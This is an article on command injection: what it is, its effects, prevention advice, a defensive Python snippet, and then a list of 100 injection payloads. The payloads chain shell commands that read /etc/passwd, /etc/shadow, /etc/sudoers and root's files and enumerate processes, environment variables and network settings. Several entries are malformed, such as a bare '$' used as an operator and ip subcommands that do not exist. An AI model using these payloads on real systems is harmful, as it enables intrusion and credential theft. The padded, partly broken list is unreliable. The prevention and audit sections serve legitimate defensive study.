Command injection is an attack in which the goal is to execute system commands on a host machine through a vulnerable application. It is one of the most common web application vulnerabilities and occurs when untrusted data is sent to an interpreter as part of a command or query.
1. What is Command Injection?
Command injection is an attack in which an attacker executes arbitrary system commands on a vulnerable host. The attacker injects commands into an application, which then executes them on the underlying host. Command injection is one of the most common web application vulnerabilities and can lead to serious consequences such as data leakage, privilege escalation, and system compromise.
2. How Does Command Injection Work?
Command injection occurs when an application passes untrusted data to an interpreter as part of a command or query. The attacker supplies input containing additional commands, which the interpreter then executes on the host system. Such input can arrive through form fields, file uploads, and any other part of the application that accepts external data.
3. What Are the Effects of Command Injection?
Command injection can have serious consequences, including data leakage, privilege escalation, and system compromise. It can also be used to gain access to sensitive data, execute malicious code, and launch denial-of-service attacks.
4. How Can You Prevent Command Injection?
To prevent command injection, validate user input properly: all input should be sanitized and filtered so that it cannot carry any malicious code. The application's privileges should also be limited so that it cannot execute commands that could be used in an attack. Finally, regular security audits should be performed to identify potential vulnerabilities.
How to Find Command Injection
The most effective way to find command injection vulnerabilities is a comprehensive security audit of the web application. During the audit, security professionals should identify every place where user input is accepted and then passed to an interpreter, and examine each one closely to confirm that the input is properly sanitized and filtered before use. They should also identify any areas of the application where privileged commands can be executed; these areas should be closely monitored, and any suspicious activity should be investigated.
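As an added example that is not part of the original article, the Python below ties the prevention and audit sections together: it contrasts the vulnerable pattern of interpolating user input into a shell string with the hardened pattern of allowlist validation plus an argv list, and includes the metacharacter check an audit or log review would apply to incoming parameters. The `ping` command, the hostname allowlist and the sample inputs are assumptions made for this demo.

```python
import re
import shlex
from typing import List

# Constructed sample inputs for the demo (not captured from any real system).
SAFE_INPUT = "example.com"
INJECTED_INPUT = "example.com; cat /etc/passwd"

# Control operators with which a POSIX shell starts a second command.
SHELL_OPERATORS = {";", "|", "||", "&", "&&"}

# Hypothetical allowlist for the demo: hostname or IPv4 characters only.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def build_command_unsafe(host: str) -> str:
    """Vulnerable pattern: untrusted input interpolated into a shell string.
    A caller running this with subprocess.run(cmd, shell=True) lets the shell
    interpret any metacharacters the user supplied."""
    return f"ping -c 1 {host}"


def shell_command_count(cmd: str) -> int:
    """Tokenize cmd the way a POSIX shell would and count the commands in it.
    A result above 1 means the input turned into an extra command."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return 1 + sum(1 for tok in lex if tok in SHELL_OPERATORS)


def build_command_safe(host: str) -> List[str]:
    """Hardened pattern: reject anything outside the allowlist, then build an
    argv list for subprocess.run(argv) with no shell=True, so the input is a
    single argument and metacharacters are never interpreted."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host argument: {host!r}")
    if host.startswith("-"):
        # A leading dash would let the value be parsed as a ping option.
        raise ValueError(f"rejected option-like host: {host!r}")
    return ["ping", "-c", "1", host]


def is_suspicious(user_input: str) -> bool:
    """Audit/logging check: flag input carrying shell metacharacters so the
    request is investigated even if validation already rejected it."""
    return any(ch in user_input for ch in ";|&$`\n")
```

Running `shell_command_count` over the vulnerable string shows the injected input becoming a second command, while the hardened builder rejects the same input before any command exists.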
Parameters To Find Command Injection
When searching for command injection vulnerabilities, it is important to consider the following parameters:
1. User Input: All user input should be carefully examined to ensure that it does not contain any malicious code.
2. Privileged Commands: Security professionals should look for any areas of the application where privileged commands can be executed. Any suspicious activity should be investigated.
3. Authentication: Authentication should be used to ensure that only authorized users are able to access sensitive areas of the application.
4. Logging: Logging should be enabled to monitor all activity on the system and identify any potential attacks.
5. Encryption: Encryption should be used to protect sensitive data and communications.
100 Command Injection Payloads
1. ;cat /etc/passwd
2. & whoami
3. | wc -l
4. && ls -al
5. $ ls -lah
6. ; ls -al
7. | grep -i password
8. & find / -type f -name "*.conf"
9. | find / -name "*.txt"
10. && find / -type f -name "*.log"
11. $ sort /etc/passwd
12. ; sort /etc/shadow
13. & cat /proc/version
14. | cat /etc/issue
15. && cat /etc/hosts
16. $ cat /etc/resolv.conf
17. ; echo "test"
18. & echo "test" > /tmp/test.txt
19. | ps aux
20. && ps -ef
21. $ netstat -anp
22. ; netstat -tulpn
23. & who
24. | whoami
25. && env
26. $ env | grep -i path
27. ; cat /etc/services
28. & cat /etc/group
29. | cat /root/.bashrc
30. && cat /root/.profile
31. $ cat /etc/sudoers
32. ; ls -alh /etc/ssh
33. & ls -alh /root
34. | ls -alh /home
35. && ls -alh /var/log
36. $ cat /proc/cpuinfo
37. ; cat /proc/meminfo
38. & cat /proc/loadavg
39. | cat /proc/stat
40. && cat /proc/net/dev
41. $ cat /proc/net/arp
42. ; cat /proc/net/route
43. & cat /proc/net/ip_mr_cache
44. | cat /proc/net/ip_conntrack
45. && cat /proc/net/ipv6_route
46. $ cat /proc/net/ipv6_mr_cache
47. ; cat /proc/net/ipv6_conntrack
48. & cat /proc/net/icmp
49. | cat /proc/net/igmp
50. && cat /proc/net/raw
51. $ cat /proc/net/raw6
52. ; cat /proc/net/udp
53. & cat /proc/net/udp6
54. | cat /proc/net/tcp
55. && cat /proc/net/tcp6
56. $ cat /proc/sys/net/ipv4/ip_forward
57. ; cat /proc/sys/net/ipv4/conf/all/rp_filter
58. & cat /proc/sys/net/ipv4/icmp_echo_ignore_all
59. | cat /proc/sys/net/ipv6/conf/all/disable_ipv6
60. && cat /proc/sys/net/ipv6/conf/default/disable_ipv6
61. $ cat /proc/sys/net/ipv4/conf/default/accept_redirects
62. ; cat /proc/sys/net/ipv4/conf/all/accept_source_route
63. & cat /proc/sys/net/ipv6/conf/default/accept_redirects
64. | cat /proc/sys/net/ipv6/conf/all/accept_source_route
65. && ip route show
66. $ ip route show table all
67. ; ip route show table local
68. & ip route show table main
69. | ip route show table default
70. && ip rule show
71. $ ip -6 rule show
72. ; ip -6 route show table main
73. & ip -6 route show table local
74. | ip -6 route show table default
75. && ip -s link
76. $ ip -s addr
77. ; ip -s route
78. & ip -s neigh
79. | ip -s rule
80. && ip -s maddr
81. $ ip -s mroute
82. ; ip -s mrule
83. & ip -6 tunnel show
84. | ip -6 tunnel show table
85. && ip -6 tunnel show table main
86. $ ip -6 tunnel show table local
87. ; ip -6 tunnel show table default
88. & ip -6 tunnel show table all
89. | ip link show
90. && ip addr show
91. $ ip route show
92. ; ip route show table
93. & ip neigh show
94. | ip rule show
95. && ip maddr show
96. $ ip mroute show
97. ; ip mrule show
98. & ip -s link show
99. | ip -s addr show
100. && ip -s route show